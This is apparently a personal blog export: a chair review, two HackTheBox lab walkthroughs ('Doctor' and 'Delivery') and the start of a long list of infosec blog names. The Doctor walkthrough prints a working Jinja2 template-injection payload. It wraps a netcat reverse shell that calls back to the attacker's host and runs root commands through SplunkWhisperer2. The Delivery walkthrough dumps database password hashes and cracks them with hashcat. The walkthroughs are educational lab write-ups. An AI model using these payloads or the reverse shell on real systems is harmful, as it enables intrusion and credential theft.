The Logitech variant of the Embody chair features an “enhanced gaming seat”, the main feature of which is an added 1/2-inch layer of copper-infused cooling foam. What’s not to like about a little extra cooling-cush for your tush right? Among the many adjustment options this chair supports, there is the ability to extend the seat depth. The problem here is when you extend the seat (which those who are a little taller would likely want to do), the added foam is not extended as well. The result is a very pronounced end to the foam which may not seem like much when you first sit down but as time passes, I began to feel the divide between the normal cushioned part of the chair and the extended, non-cushioned part of the chair. After sitting in the chair a while, I began to feel what seemed like a bar, jutting into my legs and running across the underside of my thighs. It was only after disconnecting the seat flap and inspecting the underside of the seat that I realized it was this exact boundary line where I was feeling the protrusion.

The irony here of course is that the one (functional) added feature made to the Logitech version of this chair, the “enhanced gaming seat” is also the feature which dooms it (in my opinion). Though I haven’t tried the Embody classic, I would suspect it doesn’t suffer this or any similar design flaw. Only after I made this unfortunate discovery did I find reviews of the chair on Herman Miller’s website lamenting the same problem…

Backing up for a second. After I determined the chair was uncomfortable due to the “protruding bar-like sensation” but before I realized why exactly I was feeling that, I contacted Herman Miller support, explaining the discomfort. This is the response I received…

“Sorry for the delay. You’re feeling the extra cushion. There is no defect in the chair. That’s just the way the fabric and extra cushion were designed.”

Well alright then, it’s definitely a feature not a bug!

Pros

Awesome design. Will definitely look cool in your work-space.
Ergonomics of the seat-back were really fantastic. Lower-back support and it’s adherence to my spine seemed uniquely impressive.
The chair is very adjustable. (Arm height and width, back fit, seat depth, seat height, etc…)
Smaller profile seat-back made swiveling my legs out from under my desk easier as I did not have to push the chair out from under the desk in order to get out of the chair.

Cons

Foam padding does not extend all the way to the front of the chair. This makes sitting in the chair very uncomfortable.
Seat bottom is generally uncomfortable.
Arm rests are clunky, a little wonky to adjust and are too easily pushed out or in with accidental pressure.
The chair is very creaky/noisy.

An Attempt to Fix the Chair

I spent $1500 on this piece and despite Herman Miller’s lack-of-support from their support staff, I still liked enough about it that I felt compelled to try and fix the fundamental flaw plaguing this chair if could. From my previous dissection, I knew I had access to the underside of the seat flap where the built-in padding was. My proposed solution was to buy a 1/2 inch-thich foam yoga mat and cut a piece of it to fit the portion of the extended seat that was foam-less. You can look in wonder upon this brilliance below…

Unfortunately, even with this addition, after some time I still felt that same uncomfortable divide. Perhaps the newly introduced foam wasn’t quite the same thickness? Or maybe the yoga mat depressed a different amount than the built-in foam? In any case, the chair was still equally uncomfortable. In the end, I take solace in knowing I tried to make it work, but in the end, the enhanced seat cushion did not only fail to enhance the chair, it was in fact the dealbreaker. Luckily enough, Herman Miller has a good return policy. Just remember to keep the box and packaging materials it came with!

Moving On

So my quest continues. After resolving to return the Embody, I did more chair research and stumbled across the oft-reviewed chairs from SecretLab. Perusing the site, I decided on trying out the Secretlab TITAN. I’m actually sitting in this chair as I finish typing out the Embody review! I’ll post an update if this chair ends up being the one for me.

HackTheBox: Doctor

Sat, 06 Feb 2021 09:50:00 -0500

This is the first in a series of HackTheBox write-ups I intend on producing. You’ll find that my walkthrough style is very “to-the-point”, with a sprinkling of commentary on my thought process as well as some of the things I tried first before actually figuring out the next step in the exploitation chain.

Note: These write-ups assume you have familiarity with HackTheBox, know how to get an account and understand how to connect to the individual boxes themselves over the HtB VPN.

Jump to Section

Reconnaissance & Foothold
User
Root
Outro

Doctor

For this first box, I went with “Doctor”. This Linux system was rated “Easy” by HackTheBox and rated closer to a “Medium” difficulty by HackTheBox users.

Reconnaissance & Foothold

First, I verified connectivity to the target system with the following command. This is NMAP’s Ping Scan flag (-sn) which performs a couple different types of pings (e.g. ICMP, TCP, etc…)

nmap -sn 10.10.10.209

Once I verified connectivity, I did a quick SYN (-sS) port / service discovery scan also using NMAP (sticking with just the default NMAP ports).

sudo nmap -sS 10.10.10.209 -sV

TIP: You’ll notice I used sudo for this specific NMAP command. This is required when sending raw network traffic which happens by default with the command as written above.

With this scan, I’ve identified ports 22, 80 and 8809. The web server (listening on port 80) would be the natural place to start snooping around but the service (Splunkd httpd) listening on 8089 drew my attention first as it isn’t something I see every day.

The service listening on this port is a web server and hosted something clearly Splunk-related. At first glance, I noticed there is a version number (8.0.5) visible as well as some links that could prove interesting (named - “rpc”, “services”, “servicesNS” and “static”, respectively). Clicking on some of these gave me a password modal that after a few standard password guess attempts yielded no further entry. I poked around this web server a bit more but couldn’t find anything that helped push me forward so I decided to check out the web server on port 80 I had discovered earlier.

Having turned my attention to the web server on port 80 (http://10.10.10.209)., I began an initial high-level recon sweep… no robots.txt, no obvious third party web app libraries/components in use (after viewing source and clicking on all the visible links) and no obvious injection points or form fields to abuse…hmm…

What I did notice was the domain info@doctors.htb on the main page. Adding the line “10.10.10.209 doctors.htb” to my /etc/hosts file, I was then able to navigate to the virtual host http://doctors.htb where I found some new functionality. What I found was a portal titled “Doctor Secure Messaging”. After registering a user, I was then then able to create a “message” via the “New Message” link in the top right of the portal. Posting this message did nothing particularly interesting and trying a few basic injection payloads in the message form fields didn’t seem to do much either as the messages themselves we’re not reflected back to the http://doctors.htb/home page.

When viewing the source of the /home page I noticed an interesting nugget - the comment “<!-archive still under beta testing“…

Navigating to doctors.htb/archive page I find merely a blank page. Viewing the source of this page, I see an XML-based RSS feed where the data from the title fields of the messages from the previous functionality have been reflected. This is shown below…

OK, so this is definitely where the box got a little tricky for me and based on the forum posts for this particular system, where it got tricky for a lot of other HackTheBox-ers. Fortunately, some small bit of my past web-app pentesting experience would ultimately come in handy for figuring out how to exploit this particular component.

At first, I wasn’t exactly sure what to do so I resorted to just throwing injection payloads at the title field of the messaging component until something stuck. Some time later, I saw one of my payloads, {{10*10}} evaluate on the /archive page to “100”. It was here, with this payload, I was reminded of an injection-class I had previously found on a penetration test - specifically, Server Side Template Injection (SSTI). So, i started spamming some SSTI payloads. After some time, and plenty of googling - I came across the following blog post https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/ which housed a payload that worked for me.

\{\{request.application.__globals__.__builtins__.__import__('os').popen('hostname').read()\}\}

Throwing this payload into the messages “title” field, I get some code execution and output of the command in the /archive as shown below. As you can see, we can now run code on the host “Doctor”!

After confirming I could indeed execute arbitrary commands, I wanted to get a reverse shell in order to more easily peruse the file system, escalate privileges, etc… To do so, I spun up a netcat listener using “nc -nlvp 4444” on my host system and then dropped the following reverse shell into the previous injection payload.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 4444> /tmp/f

The final payload looked as shown below…

\{\{request.application.__globals__.__builtins__.__import__('os').popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 4444> /tmp/f').read()\}\}

Now after submitting the message with the payload above in the title and then refreshing the /archive page, I got the shell shoveled back to my host system!

User Flag

Now, with the initial foothold on “Doctor” as the “web” user, first we want to upgrade our shell to a fully interactive TTY shell. We can do so by running the following…

python3 -c 'import pty; pty.spawn("/bin/bash")'

Taking a look at /etc/passwd I see two potentially interesting users, “shaun” and “splunk”. From here, I tried A LOT of typical information gathering and privesc stuff, much of which comes from the classic g0tmilk Linux Privesc guide. After some time, I made my way to /var/log and found an apache backup file with a rather revealing log entry. I found this by grepping for “password” using the command below.

grep -r password . 2>/dev/null

Note: The 2>/dev/null is going to send my error output to /dev/null so errors won’t be printed to command output. This cleans up the output of this command.

The log entry of interest from this command is as you can see below…

./apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
Binary file ./journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches

In this log entry, we can see a password reset which was initiated by shaun. One “su shaun” with “Guitar123” later and I am now shaun. Digging around in the Linux host as shaun for a while turned up nothing in terms of progression to root but I was able to pull down the user.txt file in shaun’s home directory.

Root Flag

With a set of credentials in-hand, I decided to return to the Splunkd httpd server I had discovered earlier. Using these creds on that main site of the splunkd server I find that they…work! Ok, great. Now how does that help me get root? After some tooling around with the newly exposed functionality and the “rpc” component of the server, I turned yet again to trusty Google. Quickly into that research stint I came across this blog article which then led me to the handy-dandy tool SplunkWhisperer, second of its name. From the documentation, it appeared this tool could give me code execution.

Of course even if I was able to execute code within the context of the user who installed splunkd, that wouldn’t guarantee I would have root privileges - not unless of course that service was run as root (or someone with sudo/root privs). So back to my low-priv shell on the Linux box I go to check on the origins of the splunkd service.

Lo’ and behold, splunkd is running, courtesy of root! (as shown below…)

Ok, so root ran splunkd, and splunkd will faithfully execute some code for me via SplunkWhisperer. Let’s put it all together… I clone down SplunkWhisperer2, cd to PySplunkWhisperer2 and then try a simple payload, run remotely via PySplunkWhisperer2_remote.py…

git clone https://github.com/cnotin/SplunkWhisperer2.git
cd PySplunkWhisperer2
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.29 --username shaun --password Guitar123 --payload id

Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmped00srun.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.29:8181/
10.10.10.209 - - [15/Jan/2021 15:19:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Ok…. hmmm… I didn’t get much in the way of command output after running SplunkWhisperer. I figure everything looks right with the command syntax so I assumed the code was indeed running as root on the remote machine however this tool just simply doesn’t provide the command output in it’s own output. To test this, I whipped up a different (still very simple) command to cat the username for which the service would execute as to a file, write that file to the /tmp directory and then chmod the permissions so I could read it as shaun or web via my already established session.

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.29 --username shaun --password Guitar123 --payload "whoami > /tmp/whoami.txt; chmod 777 /tmp/whoami.txt"

Turns out - splunkd was indeed run as root!

Alright, now I want the root flag. So instead, I cat the root.txt flag from /root to a file in /tmp, chmod it and then read it the same way as before!

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.29 --username shaun --password Guitar123 --payload "cat /root/root.txt > /tmp/rootflag.txt; chmod 777 /tmp/rootflag.txt"

Eureka!

Wrap Up

Overall, I think this box was indeed (relatively) easy, as HackTheBox themselves said. Though I must admit, parts of it did prove a little tricky for me in practice. Some of my big takeaways from this box were…

SSTI is something I should more regularly account for as part of my normal injection tests.
From a defensive perspective, it seems like a good idea to avoid randomly exposing Splunk to untrusted users (if you are an administrator of Splunk)
Logs are a great place to hunt for loot. In fact, a little clue related to the log portion of this box is hidden in plain-sight. Thanks to one of my coworkers, the (very) subtle clue, hidden inside the artwork for the box itself, hints at this very thing (take notice of the “log” and the “injection”). Take a look for yourself and revel in it’s unnerving elegance.

HackTheBox: Delivery

Fri, 22 Jan 2021 09:50:00 -0500

Hello and welcome to another chapter in my HackTheBox writeup series. Today’s challenge is “Delivery”.

Jump to Section

Reconnaissance
User
Root

Reconnaissance

…and awaaay we go! Target IP is 10.10.10.222, so let’s start with some (N)mappin’…

─$ sudo nmap -sS 10.10.10.222 -A
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 15:50 EST
Nmap scan report for 10.10.10.222
Host is up (0.095s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/26%OT=22%CT=1%CU=44461%PV=Y%DS=2%DC=T%G=Y%TM=601080A
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   93.30 ms 10.10.14.1
2   94.48 ms 10.10.10.222

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.86 seconds

Scan results yield a web server (port 80) and an SSH server (port 22). Let’s first check out the web server. On the main page I see a link to a new subdomain helpdesk.delivery.htb. (You may need to scroll to the right in the snippet below to see what I am referring to.)

<p><!--[-->The best place to get all your email related support <!--]--><br />
								<!--[-->For an account check out our <a href="http://helpdesk.delivery.htb">helpdesk</a><!--]--></p>

Add this to the /etc/hosts file and then navigate to helpdesk.delivery.htb in the browser. On this new site I see what appears to be some sort of IT Help Desk support portal. If I create a new ticket (I can do this without a pre-existing account), I get a confirmation which has both an email address and a ticket number.

evil,

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 1497526.

If you want to add more information to your ticket, just email 1497526@delivery.htb.

Thanks,

Support Team

User

I can monitor the status of the previously created ticket within the portal by using the email address and ticket number provided to me in the confirmation. I’ll keep the window open that has this status information available.

Back on the main delivery.htb site, there is a link to a different portal “Mattermost” (listening on port 8065). Using Mattermost, I can register for an account using the email I received when I opened the ticket (the id#@delivery.htb) as well as a username and password of my choosing. Once done, the confirmation email will be sent to the ticket I created earlier as a status update. I can simply refresh the status of that ticket and I will see a confirmation link like the one shown below.

http://delivery.htb:8065/do_verify_email?token=ixpiw4m8euet9gm96xs8ab86y1r4xxpw5ftwt5gjy6d4issi3ras9mgyrue1biig&email=1497526%40delivery.htb

Clicking on this link I am presented with a very revealing chat history. In this chat I see not only SSH credentials for a user account named maildeliverer but I also see a hint about another password. This tip describes hashcat rules which may assist in cracking the hashed password. This gives us an idea of what to look for as we go for root on the box.

System
9:25 AM

@root joined the team.
System
9:28 AM
@root updated the channel display name from: Town Square to: Internal
root
9:29 AM

@developers Please update theme to the OSTicket before we go live.  Credentials to the server are maildeliverer:Youve_G0t_Mail!

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
root
10:58 AM

PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.

Let’s try using the SSH creds from the chat…

└─$ ssh maildeliverer@10.10.10.222                                                                                                            130 ⨯ 1 ⚙
maildeliverer@10.10.10.222's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$

Bingo! User.

Root

Alright, now as maildeliverer, let’s take a look around the file system. I got in through the Mattermost app so it makes sense to see what else this app has to offer on the local system. I find a number of “mattermost” related directories (as shown below).

maildeliverer@Delivery:~$ find / -name mattermost 2>/dev/null
/opt/mattermost
/opt/mattermost/bin/mattermost
/var/lib/mysql/mattermost

Inside /opt/mattermost i find a config file which reveals some mysql credentials.

SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],

I can then use these mysql creds to jump into the mysql instance. Inside, I see a mattermost database with a “Users” table. Dumping this table I get some usernames and… password hashes!

maildeliverer@Delivery:/opt/mattermost/config$ mysql -h localhost -u mmuser -pCrack_The_MM_Admin_PW
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 210
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
| ChannelMembers         |
| Channels               |
| ClusterDiscovery       |
| CommandWebhooks        |
| Commands               |
| Compliances            |
| Emoji                  |
| FileInfo               |
| GroupChannels          |
| GroupMembers           |
| GroupTeams             |
| IncomingWebhooks       |
| Jobs                   |
| Licenses               |
| LinkMetadata           |
| OAuthAccessData        |
| OAuthApps              |
| OAuthAuthData          |
| OutgoingWebhooks       |
| PluginKeyValueStore    |
| Posts                  |
| Preferences            |
| ProductNoticeViewState |
| PublicChannels         |
| Reactions              |
| Roles                  |
| Schemes                |
| Sessions               |
| SidebarCategories      |
| SidebarChannels        |
| Status                 |
| Systems                |
| TeamMembers            |
| Teams                  |
| TermsOfService         |
| ThreadMemberships      |
| Threads                |
| Tokens                 |
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+
46 rows in set (0.001 sec)

MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| evil                             | $2a$10$QXvgO259JKkTSXYQvSLk7ue3InvrsxM5wPVuT5ywrjHDM1XG.9Ary |
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.000 sec)

Using the password variant hint and the earlier mention of “hashcat” as a guide, I create a password list using the best64.rule haschat .rule file.

hashcat -r /usr/share/hashcat/rules/best64.rule --stdout clue > password.txt

I now run hashcat against the root hash pulled from mysql with the newly generated wordlist and a few seconds later…

┌──(kali㉿kali)-[/tmp]
└─$ hashcat -m 3200 hash password.txt                                           
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-4870HQ CPU @ 2.50GHz, 1407/1471 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: password.txt
* Passwords.: 77
* Bytes.....: 1177
* Keyspace..: 77
* Runtime...: 0 secs

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Tue Jan 26 17:12:02 2021 (0 secs)
Time.Estimated...: Tue Jan 26 17:12:02 2021 (0 secs)
Guess.Base.......: File (password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       55 H/s (8.82ms) @ Accel:8 Loops:16 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32/77 (41.56%)
Rejected.........: 0/32 (0.00%)
Restore.Point....: 0/77 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidates.#1....: PleaseSubscribe! -> PleaseSubscribs

Started: Tue Jan 26 17:12:00 2021
Stopped: Tue Jan 26 17:12:04 2021

Root!

Infosec Blogs: Our Cup Runneth Over

Sun, 17 Jan 2021 09:50:00 -0500

I was inspired by this tweet to compile a master-list of infosec-related blogs. Of course I knew this would turn up quite a few results but I’ve really been amazed by how much is out there! Infosec blogs of all shapes and sizes are out there in the wild and I want to find ‘em all. Will try to keep this up-to-date as I run across new sites. I’ve split it into blogs from “individuals” versus those run by larger commercial organizations. If i’m missing one you know of, or it’s your blog that is missing, please contact me!

For anyone interested, I’ve made available my exported .opml file (last exported: November 8, 2023) with the sources listed below. You can import this into the RSS reader of your choice! Personally, I use Feedly and can highly recommend the service. (I will try to update this export semi-regularly).

- Boutique Security Blogs
- Commercial Blogs
- Writeup Blogs
- Aggro Sites

Search is not overly optimized, may be a little jittery...

Total:

Boutique Security Blogs

Commercial Blogs

0ffset
0xide
360 Total Security
3NAILS
404 Media
7Elements
A-LIGN
Abnormal Security
AboutDFIR
Abstract Security
Abuse|ch
Abusix
AC3
acceis
Accenture Cyber defense blog
Acronis
Acros
Active Countermeasures
ActiveCyber
Acunetix
Ada Logics
AdGuard
adolus
ADV Intel
Adversis
AgileHunt
Aikido
Aim Security
Airbus
Airbus Security Lab
AIS
Akamai
Akeyless
Aleph Research
Alesandro Ortiz
Alessandro Bresciani
Alessandro Mantovani
alperovitch institute
Alter Solutions
Altered Security
Ambionics Security
Amnesty International Security Lab
Ampere
Analyst1
Anquanke
Anthropic
The Antisocial Engineer
Anvil Secure
Any.Run
Aon
apiiro
APLens
APNIC
AppCheck
appgate
Appknox
Apple Security Research
AppOmni
AppSec Engineer
Appsecco
Aqua
Aquia
arachni
Arctic Wolf
ARGOS Cloud Security Blog
Arkose Labs
amradillo
Armis
Armo
arnica
Arsenal Recon
ArtResilia
ASEC
AssetNote
Assurance Maladie Security Team
Assured Blogs
astra
Astrix
AT&T Cybersecurity
Athene
Atos
Atredis
Atredis Partners
Authentic8
Authomize
Automox
Autopsy Digital Forensics
Avanan
Avast Engineering
avatao
Averlon
Avertium
Avira
Awake Security
AweSec
BackBox
Bad Sector Labs
Balasys
Baldur
Balwurk
Barghest
Barracuda
Bastion Zero
BCSecurity
bearer
Belkasoft
Beryllium
Betrusted
BeVigil
BFSLABS
BHConsulting
Binarly
Binary Defense
Binary Gecko
Binary Security
BinaryNinja
BitCrack
BiteGarden
BitSentinel
Bitsight
Black Hat
Black Hills Information Security
Black Lantern Security (BLSOPS)
BlackArrow
BlackBerry ThreatVector Blog
blackchili
BlackheathPoint
BlackStorm Security
Blackwing Intelligence
Blindspot
BlockMagnates
Bloodhound Enterprise
Blue Goat Cyber
Blueliv
Blumira
Bodforss
Boschko Security Blog
Bounce Security
bountyplz.xyz
Brackish Security
Brain Frame
Brandefense
BREAKPOINT
Breakpoint Security
bridgecrew
Britive
BUFFERZONE
Bugbase
Bugcrowd
BugProve
Bugscale
Bulletproof TLS Newsletter
The Bun Security Blog
C9Lab Blog
Cado
Caffeine Security
caniphish
Capture The Talent
Carve Systems
Catalyst
Catchify
CATONetworks
Cellebrite
Cenobe
censorship.ai
Census
Censys
Center for Cybersecurity Policy and Law
Center for Internet Security
Centre For Cyber Security Belgium
Cerbero Blog
Cerbos
CERIAS Blog | Purdue University
CERT.EU
CERT.PL
certego
Certik
Certitude
Chainguard, Inc.
Chainwide.io
char49
Chaser Systems
Check Point
Check Point Research
Checkmarx
Chef Secure
chrome.security
Chronicle | Google Cloud
cirosec
Cisco Umbrella
CISPA
The Citizen Lab
claranet
Claroty + T82
Cleafy
ClearSky Cyber Security
Cloudflare
CloudQuery
CloudSEK
Coalfire
cobalt iron
Cobalt Strike
Cobalt.io
Code Grazer
Code Intelligence
Codean
Codingo
Cognisys Labs
CoGuard
Compass Security Blog
Computest
Confiant
Context Accenture
Contrast Security
controlplane
Converge Technology Solutions
Conveyor
Conviso
CoreSecurity
Cossack Labs
Counter Craft
CQURE Academy
Cremit
Criminal IP
Crossroads Information Security & www
CrowdSec
CrowdStrike
Cryptic Red
The Cryptography Caffè
CSDN
CSIDB
CSNP
CTI League
CujoAI
Curesec Security Research Blog
Cutaway Security
Cyata
Cyber Castle
The Cyber Resilience Institute
Cyber Sophia
Cyber Threat Alliance
Cyber Triage
Cyberark
Cyberark Conjur
CyberArmor
CyberBit
CyberCX
CyberDanube
Cybereason
CyberHunter
Cyberint
Cyberis
Cyberlix
CYBERMATERIAL
Cybernari
cybersixgill
Cybervelia
Cybervore
CyberWarFare
CyberXplore
Cyble
Cyco
Cycode
Cycuity
Cyentia Institute
Cyera
Cyfirma
Cyjax
Cylect
Cyllective
Cyloq
Cymetrics Tech Blog
Cymptom
Cymtrick
Cymulate
Cynopticon
Cyolo
Cypherowl
CYS4
Cyscale
CYSOURCE
CyStack
Cyvisory Group
Cyware
cz.nic
D3
Da22le
Dale Peterson
Dark Atlas
Dark Mentor
dark vortex
DarkForge Labs
DarkOwl Blog
DarkRelay
Darktrace
DarunGrim
DataDog Security Labs
datawiza
DebugPointer
Decoded Avast.io
deepfence
DeepInstinct
Defense.com
Defense.One
Defensive Security
Defused
DeleteMe
delivr.to
Dellfer
Depth Security
Der Security
Derant
descope
Deteact
Detectify
DevCore
Devsecurely
DFFENDERS BLOG
DFIR MADNESS
DFRWS
Dhound
Dig Security
Digital Detective
Digital Forensics Consultancy
Direct Defense
Discernible
Diverto
Dolos Group
Domain Guard
Dr.WEB Anti-virus
Dragos
Drata
Dreadnode
DreamLab Technologies
DSEC Bypass
Duasynt
Duo
Duo | Decipher
DuskRise
DuskRise | Cluster25
Dvuln
EasyDMARC
Eaton Works
EchoTrail
EclecticIQ
Eclypsium
Edgeless Systems
eForensics Magazine
ekahau
Elastic Security Labs
ElcomSoft
EliteSec
elttam
EMSISOFT
Endor Labs
ENEA
Enso
Epsilon
Eptalights
Equilibrium Security
Erasec
ermetic
escape
esentire
eShard
Ethereum Foundation
Ethiack Blog
E.V.A. Information Security
Evervault
Exein
Exodus Intelligence
Expel.io
Exploit Security
Exploring Information Security
Eye Security
F-Secure Labs
F5 Labs
Facebook Engineering
Faction
FalconFeeds
Fenrisk
Fidus Information Security
Field Effect
Fingerprint
FingerprintJS
Finite State
FireEye
FireHydrant
fishtech group
Flare Systems
Flashback Team
Flatt Security
fleet
Flipper
fluid attacks
Forcepoint
Forescout
Foretrace
Foreseeti
Form3
Fortalice
Fortbridge
Foritified Health Security
FortiGuard Labs
Fortinet
FortyNorth Security
FourCore
Foxglove Security
Fraktal
frontegg
FRSECURE
FullHunt
Fuo’s blog
Fura Labs
Fuzzbuzz
Fuzzing IO
Fuzzing Labs
FWDSEC
Galah Cyber
Garantir Blog
GData
Gem
Gen
GenAI Security Project
Genians
Gigamon
Gigasheet
GitGuardian
The Github Blog | Security + Security Lab
GitProtect
GlitchSecure
Google Security Blog
Google Threat Analysis Group (TAG)
Google VRP Writeups
GoSecure
Gremwell
gretel
Grey Dynamics
Grey Hat Developer
Grimm
Grith.ai
GRNET CERT
grsecurity
GTSC
Guardicore
Guardio
Guardsquare
Guidepoint Security
Hacken
HackerCool
hackerone
Hackers-Arise
HACKLIDO
Hackmageddon
HackSys Inc
HackTheBox
Hadess
Hadrian
Hakai
Hakai Research
Hakin9
Halborn
Hardened Vault
hardwear.io
HARFANGLAB
Hatching
HAWK.io
Hawktrace
hax & hacspec
HDW Sec
Herjavec Group
Hex-Rays
HexArcana
Hidden Layer
HiSolutions Research
Hispasec
Hive Systems
hn security
Hold Security
HORIZON3.ai
howdays
Hoxhunt
The Honeynet Project
HP Wolf Security
HTTP Toolkit
Human Security
Hunt & Hackett
Hunters
Huntress
IANS
IBM System Security
icebreaker
IDPro
IDS Alliance
IFCR | Institut For Cyber Risk
Immersive Labs
immunIT
Immunity Inc. Blog
Immunity Services
ImmuniWeb
Impalabs
Imperva
Improsec
in.security
Include Security
